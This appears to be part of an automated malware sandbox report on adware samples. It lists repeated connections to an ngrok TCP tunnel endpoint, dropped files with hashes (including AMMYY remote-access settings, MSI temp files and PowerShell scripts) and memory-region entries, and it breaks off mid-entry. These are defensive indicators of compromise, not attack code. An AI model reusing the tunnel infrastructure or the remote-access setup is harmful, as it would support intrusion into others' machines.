US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 8.8.8.8:53 9.tcp.ngrok.io udp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 8.8.8.8:53 9.tcp.ngrok.io udp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 8.8.8.8:53 9.tcp.ngrok.io udp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp

Files

C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe

MD5 190785b2bb664324334c1b5231b5c4b0
SHA1 07539abb2623fe24b9a05e240f675fa2d15268cb
SHA256 4731517b198414342891553881913565819509086b8154214462788c740b34c9
SHA512 ab40f182fb52e5281f0761cf064a7f4b82ea04a2c9c00fe6faa4e61f8e632b8c7a64820e226b2ab668c99ada195c1ca117b702474bd023d84991a16dd10ba85c

C:\ProgramData\AMMYY\settings3.bin

MD5 4cb889e527b0d0781a17f6c2dd968129
SHA1 6a6a55cd5604370660f1c1ad1025195169be8978
SHA256 2658cd46dd49335e739cafa31ff2ec63f3315b65ecc171a0f7612713d3ac702b
SHA512 297d2c05d2ac950faeb519d3e7bc56ea9d9fcab65b5dfdbba2720be8eddc8b2d5ead3dc7c122b82d6937be6c2d7bb88872dd7b80961138571245fba381daac3f

C:\ProgramData\AMMYY\hr3

MD5 d3921ace21550c8d84d2c4fc06e002a3
SHA1 fab53358868c2d3b220516c5196f49b5896b6895
SHA256 fa8edd25833c7bfc0c2e7e4e7de6d2ba0bf770e40cb53a6b0ce8b05d24a4413e
SHA512 8d22fd28db0954afa949d50a514e1c85fe3bdf9e2d515bb9e949d7349e18eb0361f7034f57e1b4c4f6890afb95883fbe11ff212ae8e9c1b3bd5b1318ebc99d5d

C:\ProgramData\AMMYY\hr

MD5 489385a913a2e7924895d4e5dc983e2c
SHA1 9155b86d92362d204fd19a5bfa9e7b4986df6734
SHA256 acaeeb19ce1ce7b68e27a010b23225f845f1125c2399c29b0cb565d1df650206
SHA512 40063f7ca7605c7b6a94a6887a1fcc1c5ab7e1814ed35d6cf0087a01c1732c3bb0ef7379a388fc93976c30d7dbc835fe3ebc88696f3c9c6d5e77b2d1458f4de4

C:\Users\Admin\Desktop\adwares\e34c196497e534f46dd5f2749af66e2d46e46fd8d78b71badfbe2363d27e8030.exe

MD5 29ffad5f4e22f3e296f4c579ce303902
SHA1 8a037d37c7238c6d9408fd99d50105b1cdb73f7f
SHA256 e34c196497e534f46dd5f2749af66e2d46e46fd8d78b71badfbe2363d27e8030
SHA512 36373e64e58192d49c831b23ee83f3a38a2d2d4da69f15fd6ec7dff2c4a9ebb5e03a7f05ef0e57ceb0f4176d97774269859a560500d21359f924bf3beb69f227

memory/4600-22-0x0000000000160000-0x00000000009B9000-memory.dmp

memory/4600-25-0x0000000000160000-0x00000000009B9000-memory.dmp

C:\Users\Admin\Desktop\adwares\b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb.exe

MD5 24a387fda6e0f36f9af44d65487c5f5b
SHA1 a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970
SHA256 b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb
SHA512 f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61

memory/1760-28-0x0000000000ED0000-0x00000000015C0000-memory.dmp

C:\Users\Admin\Desktop\adwares\70ae0ba7881ccde62370f1168b00662af52a354b97f6cf8b01219f9046c0270f.msi

MD5 e7114dd362a4799d13a3628d30b75c8d
SHA1 51b82c1d8e54bc357b4bc116d42430bda79cfbd9
SHA256 70ae0ba7881ccde62370f1168b00662af52a354b97f6cf8b01219f9046c0270f
SHA512 9047a712939901b10cbdc86ef070d695ba373a5076d97545870c024580e3e53c6e0590e2eba162471b84bd8640b8ec1d853703ad8dfae783e2e360189fc981ba

C:\Users\Admin\AppData\Local\Temp\MSI8CBA.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Users\Admin\AppData\Local\Temp\MSI8DD5.tmp

MD5 07ebb743bbd7230e04c23bcbaa03fc44
SHA1 8e6deee1ffb202f60c10aa7d7756395534e40dcf
SHA256 194b29c26d925fdc1f1aa1802714118d0ca30e413c7fea5c19a928eba7cc43b0
SHA512 f02b6f0caa860ba97d5a887bbdb28a6d417b2aa4dde91beeff57a99e05508a10b063ef1d025223fa2f566cc208f86401a38abc445d20bf208c5a4f92bb53ac24

memory/4372-50-0x0000000002E70000-0x0000000002EA6000-memory.dmp

memory/4372-49-0x00000000727F0000-0x0000000072FA0000-memory.dmp

memory/4372-51-0x0000000002FD0000-0x0000000002FE0000-memory.dmp

memory/4372-52-0x0000000005630000-0x0000000005C58000-memory.dmp

memory/4372-53-0x0000000005460000-0x0000000005482000-memory.dmp

memory/4372-54-0x0000000005500000-0x0000000005566000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4xlw1ka5.erv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4372-55-0x0000000005DE0000-0x0000000005E46000-memory.dmp

memory/4372-65-0x0000000005F80000-0x00000000062D4000-memory.dmp

memory/4372-66-0x0000000006440000-0x000000000645E000-memory.dmp

memory/4372-67-0x0000000006490000-0x00000000064DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pss8E04.tmp.ps1

MD5 f0495913b0efb5b48a43e6ddadf0d0b1
SHA1 f8b679f97d0945c334e16f075c58a2a6f9e7dc02
SHA256 519835313caf6d878c497a4f2fa6ec53f527ff49c6c9edc5ba610c2a5e2dda04
SHA512 a7f9ad541a00a2a465708d953eb62ca53d8f92540e6b5a8f7d91df04f32b36ed1172bc6d25e3d4a2a08275a179b309c5cad1d66b21c8e24fc1ce1aa4360a2f1a

C:\Users\Admin\AppData\Local\Temp\pss8DE4.tmp.ps1

MD5 0d43a81581fc985a6060d85d25a8b265
SHA1 550d11b9719faa5862c7f98a566e7d755e9e6ac2
SHA256 4527b0fd0b50d652d42a88fffcfaa902ef2b01b51c0d6b4f036ea00e955790d1
SHA512 504152d5b581d42bb9141a8febf79ce6ce5e9e80222ba042f3627a289e21845646ba06b89759d21cb7f790c724257fad6ca3382b8424ea332a1d81ac23e1d816

memory/4372-70-0x0000000002FD0000-0x0000000002FE0000-memory.dmp

memory/4372-71-0x00000000069F0000-0x0000000006A86000-memory.dmp

memory/4372-72-0x0000000006970000-0x000000000698A000-memory.dmp

memory/4372-73-0x00000000069C0000-0x00000000069E2000-memory.dmp

memory/4372-74-0x0000000007AD0000-0x0000000008074000-memory.dmp

memory/4372-75-0x0000000008700000-0x0000000008D7A000-memory.dmp

memory/4372-79-0x00000000727F0000-0x0000000072FA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msi8DE3.tmp.txt

MD5 b026e6ffa279860878010f72b6e7c2be
SHA1 c1625517b7ad6867dbf4d190bfa4381d94a0f658
SHA256 5586c7abaee86e3fd8950e22c4de531b8096ade1b3710e249a04d8a4c1c507e1
SHA512 a557c2f2450f9c3c09d0eebf7ac4818c30491f00bcdc7e4766a0670fdc6d5e58625fb92b6931a882cc1792623afc3c6dfbd3f0d2c8c7152d2046f2b590ac2210

C:\Users\Admin\AppData\Local\Temp\MSIA7F5.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Users\Admin\AppData\Local\Temp\MSIA816.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Users\Admin\AppData\Local\Temp\MSIA815.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Users\Admin\AppData\Local\Temp\MSIAA0B.tmp

MD5 07ebb743bbd7230e04c23bcbaa03fc44
SHA1 8e6deee1ffb202f60c10aa7d7756395534e40dcf
SHA256 194b29c26d925fdc1f1aa1802714118d0ca30e413c7fea5c19a928eba7cc43b0
SHA512 f02b6f0caa860ba97d5a887bbdb28a6d417b2aa4dde91beeff57a99e05508a10b063ef1d025223fa2f566cc208f86401a38abc445d20bf208c5a4f92bb53ac24

C:\Users\Admin\AppData\Local\Temp\MSIAA2C.tmp

MD5 a3aa72600009a787d43e416607b93788
SHA1 edca472f111824f894692e827960d93a96695319
SHA256 4682dde803565d892faeb5e4cde49364829d950e6f71592eeaf9ad2d2c227c7c
SHA512 c733862e75cb6bed056b0f8399e28865ca2b4ae346c83ae5fc6c0996c9ab2c56f688edf46b3ccf01cf3bbeba80b284e7e749897b3094337fac55c72cc9f3d86f

C:\Users\Admin\AppData\Local\Temp\MSIAA5B.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 0774a05ce5ee4c1af7097353c9296c62
SHA1 658ff96b111c21c39d7ad5f510fb72f9762114bb
SHA256 d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4
SHA512 104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994

C:\Users\Admin\AppData\Local\Temp\MSIABA5.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

memory/2332-115-0x00000000727F0000-0x0000000072FA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSIABA5.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

memory/2332-116-0x00000000028E0000-0x00000000028F0000-memory.dmp

memory/2332-117-0x00000000028E0000-0x00000000028F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c74a5ea6a7a45ca3654446d0c1e10afd
SHA1 3af20b62b276cc372e88ecf413adf1c70965ea95
SHA256 94e4ceeac2e2f5f2dea41b7f4fd09617764abaafe5c5fa76df363527686a856f
SHA512 6adacb022b60844993b26ff5534d82ba3c121162827f803e884205b4dc831efc55d4fcdf69fca019746ad9c1cdeb6ae73d10db7ec96fddc9985bd105bb4edefa

C:\Users\Admin\AppData\Local\Temp\pssAA2C.tmp.ps1

MD5 699bd0fd38d45159138a22b1eedb16b8
SHA1 8a2d05e386ca27c6b5110ef914af72157c21a183
SHA256 0c2905c61728369c687a3c9763db9ffb771a32fa30c7980bb45707b73b5b5363
SHA512 88db375f245187b62077ac55c0d237f56e3762e1cf31ed07b24949126e9ee846d5c81e0dbaca7bfb5ba898c2f4704d7bdf71f7d0c58d25f1ee207285b2555d46

C:\Users\Admin\AppData\Local\Temp\pssAA2B.tmp.ps1

MD5 1965ee29cc565ce1582fe3bc77941934
SHA1 a8ae9c5de6fea8756eedbc40016eea80b2505ac3
SHA256 b62b83e8b0da2db2777b05cddd5370eb43f8a3fb30971674f0c367d1c3c2da14
SHA512 d007755c00b231baea688d767a452992628cb9837c6233233fcda20b70f7bbbcdcc8ec3215fca420ba4294f7117694d153a1d248357693d14e75d5d252796ad3

memory/2332-130-0x00000000028E0000-0x00000000028F0000-memory.dmp

memory/1092-131-0x000001F9AC790000-0x000001F9AC791000-memory.dmp

memory/1092-132-0x000001F9AC790000-0x000001F9AC791000-memory.dmp

memory/1092-133-0x000001F9AC790000-0x000001F9AC791000-memory.dmp

memory/1092-137-0x000001F9AC790000-0x000001F9AC791000-memory.dmp

memory/1092-139-0x000001F9AC790000-0x000001F9AC791000-memory.dmp

memory/1092-138-0x000001F9AC790000-0x000001F9AC791000-memory.dmp

memory/1092-140-0x000001F9AC790000-0x000001F9AC791000-memory.dmp

memory/1092-142-0x000001F9AC790000-0x000001F9AC791000-memory.dmp

memory/1092-141-0x000001F9AC790000-0x000001F9AC791000-memory.dmp

memory/1092-143-0x000001F9AC790000-0x000001F9AC791000-memory.dmp

memory/2332-144-0x0000000007D40000-0x0000000007F02000-memory.dmp

memory/2332-145-0x0000000008F70000-0x000000000949C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSIB5D7.tmp

MD5 a3aa72600009a787d43e416607b93788
SHA1 edca472f111824f894692e827960d93a96695319
SHA256 4682dde803565d892faeb5e4cde49364829d950e6f71592eeaf9ad2d2c227c7c
SHA512 c733862e75cb6bed056b0f8399e28865ca2b4ae346c83ae5fc6c0996c9ab2c56f688edf46b3ccf01cf3bbeba80b284e7e749897b3094337fac55c72cc9f3d86f

C:\Users\Admin\AppData\Local\Temp\MSIB607.tmp

MD5 a3aa72600009a787d43e416607b93788
SHA1 edca472f111824f894692e827960d93a96695319
SHA256 4682dde803565d892faeb5e4cde49364829d950e6f71592eeaf9ad2d2c227c7c
SHA512 c733862e75cb6bed056b0f8399e28865ca2b4ae346c83ae5fc6c0996c9ab2c56f688edf46b3ccf01cf3bbeba80b284e7e749897b3094337fac55c72cc9f3d86f

memory/2332-154-0x0000000007520000-0x00000000075B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSIB607.tmp

MD5 a3aa72600009a787d43e416607b93788
SHA1 edca472f111824f894692e827960d93a96695319
SHA256 4682dde803565d892faeb5e4cde49364829d950e6f71592eeaf9ad2d2c227c7c
SHA512 c733862e75cb6bed056b0f8399e28865ca2b4ae346c83ae5fc6c0996c9ab2c56f688edf46b3ccf01cf3bbeba80b284e7e749897b3094337fac55c72cc9f3d86f

C:\Users\Admin\AppData\Local\Temp\MSIB5D7.tmp

MD5 a3aa72600009a787d43e416607b93788
SHA1 edca472f111824f894692e827960d93a96695319
SHA256 4682dde803565d892faeb5e4cde49364829d950e6f71592eeaf9ad2d2c227c7c
SHA512 c733862e75cb6bed056b0f8399e28865ca2b4ae346c83ae5fc6c0996c9ab2c56f688edf46b3ccf01cf3bbeba80b284e7e749897b3094337fac55c72cc9f3d86f

C:\Users\Admin\AppData\Local\Temp\MSIB6A4.tmp

MD5 a3aa72600009a787d43e416607b93788
SHA1 edca472f111824f894692e827960d93a96695319
SHA256 4682dde803565d892faeb5e4cde49364829d950e6f71592eeaf9ad2d2c227c7c
SHA512 c733862e75cb6bed056b0f8399e28865ca2b4ae346c83ae5fc6c0996c9ab2c56f688edf46b3ccf01cf3bbeba80b284e7e749897b3094337fac55c72cc9f3d86f

memory/2332-163-0x00000000727F0000-0x0000000072FA0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Eclipse Media Inc\Installer Assistant\prerequisites\WCSetup_AppWC.msi

MD5 6c3dc29e2e491beed780cf04fd770560
SHA1 5babfacb2fd257326c6ebd2ff02019f9dbb480d8
SHA256 e426d8096da87dc44e070d7934b8eb7cd996a8a19491f57234c8a77fa26f5471
SHA512 d41c74f05e4a4fd45f6f2a386614125b2cd0abd302ffe75a4fa9c6e1adff1ae772fd45b880a7378f9021d1e14989884594c61ff363ea3391b56bbb33a97cc868

C:\Windows\Installer\MSIBEB7.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Windows\Installer\MSIBF64.tmp

MD5 07ebb743bbd7230e04c23bcbaa03fc44
SHA1 8e6deee1ffb202f60c10aa7d7756395534e40dcf
SHA256 194b29c26d925fdc1f1aa1802714118d0ca30e413c7fea5c19a928eba7cc43b0
SHA512 f02b6f0caa860ba97d5a887bbdb28a6d417b2aa4dde91beeff57a99e05508a10b063ef1d025223fa2f566cc208f86401a38abc445d20bf208c5a4f92bb53ac24

memory/3752-180-0x0000000072280000-0x0000000072A30000-memory.dmp

memory/3752-181-0x0000000004CB0000-0x0000000004CC0000-memory.dmp

memory/3752-182-0x0000000004CB0000-0x0000000004CC0000-memory.dmp

memory/3752-183-0x0000000005990000-0x0000000005CE4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 89b55eeb1f563caf26edeeaa025e17ea
SHA1 1a930373ff7325c30c39fb46f89ae95f59bda3cb
SHA256 1b41d278fb3b75f58dfa2c9128c73bf3c2a0311e1e7c352ab2cb05275d390b1e
SHA512 ee49021a68dea14d4aca1947c69109801064ab0dc03dc9892292adc04fd1eceee65af2fb967f00def84172d8975a715adf40155d0cc4c1ae5c708db2c3d0052e

memory/3752-194-0x00000000060B0000-0x00000000060FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pssBF84.tmp.ps1

MD5 23ceeb26566f0064486983d84dbc1732
SHA1 ee7f40645a5e240499ad459b3850e79f61e8a3aa
SHA256 3f02fbe234dff8bfee4f871f2c9cd306d7a505163bd26775443a16b20235fca2
SHA512 04347dc8aec08002c959de0b1a8d3a77ff092161c013b7835eb2898490c54944212564ebf51fd69a34bd4ac468a06402df6bcb688b1665f873073a776c5608a8

C:\Users\Admin\AppData\Local\Temp\pssBF74.tmp.ps1

MD5 f64892b5a7640e2ea30f3b99bb2543cb
SHA1 7b805176d1b66d633132150478cc800e3cdb2e21
SHA256 cfb6033af495ba339d587a8a1799c16804ee3c8da53d1f0148509931f2586299
SHA512 ee31a8dc593b3d642e0f5a97ca3bdb485472e51741822aa031b7e32894c50e2566ccb32bcbf6a17438284d9235ab3d9aec2cfe8fc6898eadef47768b4e187db9

memory/1760-197-0x0000000000ED0000-0x00000000015C0000-memory.dmp

memory/3752-198-0x0000000004CB0000-0x0000000004CC0000-memory.dmp

memory/3752-200-0x0000000072280000-0x0000000072A30000-memory.dmp

C:\Windows\Installer\MSICDBD.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Windows\Installer\MSICE99.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
SHA256 a99d2c6fd1667942a085f01784bd599762182fce8a8f866fa12ac93f52ae2ed1
SHA512 66017ab6a11017b749cd3045597a70b29be375656fcc03df6382ddf976b7f14b4df2bbb378e1eed8df75651ca9df1c04e084f50dd8eb9eb7e056e54d47679621

C:\Windows\Installer\MSID020.tmp

MD5 07ebb743bbd7230e04c23bcbaa03fc44
SHA1 8e6deee1ffb202f60c10aa7d7756395534e40dcf
SHA256 194b29c26d925fdc1f1aa1802714118d0ca30e413c7fea5c19a928eba7cc43b0
SHA512 f02b6f0caa860ba97d5a887bbdb28a6d417b2aa4dde91beeff57a99e05508a10b063ef1d025223fa2f566cc208f86401a38abc445d20bf208c5a4f92bb53ac24

memory/3936-218-0x0000000072280000-0x0000000072A30000-memory.dmp

memory/3936-219-0x00000000054A0000-0x00000000054B0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 02ab31332cc4e380642ac6673e5b94e4
SHA1 7cc51b186bb7542a3be22d6bcae35eb61bb9793b
SHA256 c3938e55cae1a043c60fdf2b3e760c7baea79b51a853c0da8cb73e4e058b44dd
SHA512 320a0dbd953d088af4b28d90d36ef822e438e9e9b98536437c5f64455e6a1e255322d5ac44865ea25cc6e8f0fa8f56aa42fa1459664f46d9946a5520385aaa0e

C:\Users\Admin\AppData\Local\Temp\pssD09F.tmp.ps1

MD5 b6bdc6988e7e0b5ef549b06e3bb4a90e
SHA1 8063b49b8f39603fde93b4dfc7fdb91ca051d29e
SHA256 d789772194ae2f4f4adee84a2801030febd42304def4853789b60083b3489c6e
SHA512 727a938c10b9b490317f7010f6abeed27c2a1de08e3be7f58337df63d9efd6d196cd09275546e0ecfe89bc111730bb759e4624faeefcdfc2b72dc465ebf97792

C:\Users\Admin\AppData\Local\Temp\pssD09E.tmp.ps1

MD5 92e8f020390914efb6138613cc07f449
SHA1 8b4fa4c6d0b8832eb4380b3f9a861c0788ec18e5
SHA256 26cf0f5c2dfa1e3589e689f4a16041be87fcaf2b31b7be0ded273c483d9577c2
SHA512 980d19faf254a634b0b362c0d19ecb041caf32ccdfdb3ab45acc5f7a6e307a209def8ce5aea5523ec3517fc1c2eb49e10dc41759cb83becff61f13347309f677

memory/3936-232-0x00000000054A0000-0x00000000054B0000-memory.dmp

memory/3936-234-0x0000000072280000-0x0000000072A30000-memory.dmp

C:\Windows\Installer\MSID8DC.tmp

MD5 3144225f1a2dccfda435970964158357
SHA1 b535c5fcf4b4fdb2b9863cfe89c4362699bdf419
